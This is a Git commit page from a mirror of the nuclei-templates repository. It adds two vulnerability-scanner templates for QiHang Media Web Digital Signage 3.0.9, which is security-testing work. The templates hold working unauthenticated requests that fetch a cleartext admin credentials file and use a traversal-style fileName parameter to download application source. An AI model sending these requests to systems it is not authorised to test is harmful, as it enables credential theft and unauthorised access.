daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #2794 from gy741/rule-add-v63 

Rule add v63
patch-1
Prince Chaddha 2021-10-01 16:30:47 +05:30 committed by GitHub
parent c4e6e7a8a0 58fd372498
commit f7533d4d89
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 58 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
vulnerabilities/other/qihang-media-disclosure.yaml Normal file
View File

@ -0,0 +1,23 @@
id: qihang-media-disclosure
info:
name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 - Cleartext Credentials Disclosure
author: gy741
severity: critical
description: The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack.
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php
tags: qihang,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/xml/User/User.xml"
matchers:
- type: word
words:
- "<?xml version"
- "<Users>"
- "account="
- "password="
condition: and

35
vulnerabilities/other/qihang-media-lfi.yaml Normal file
View File

@ -0,0 +1,35 @@
id: qihang-media-lfi
info:
name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability
author: gy741
severity: high
description: The application suffers from an unauthenticated file disclosure vulnerability when input passed thru the filename parameter when using the download action or thru path parameter when using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources.
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php
tags: qihang,lfi
requests:
- raw:
- |
GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1
Host: {{Hostname}}
Connection: close
matchers-condition: and
matchers:
- type: word
words:
- "filename=QH.aspx"
- "application/zip"
part: header
condition: and
- type: word
regex:
- "QH.aspx.cs"
- "QiHang.Media.Web.QH"
condition: and
- type: status
status:
- 200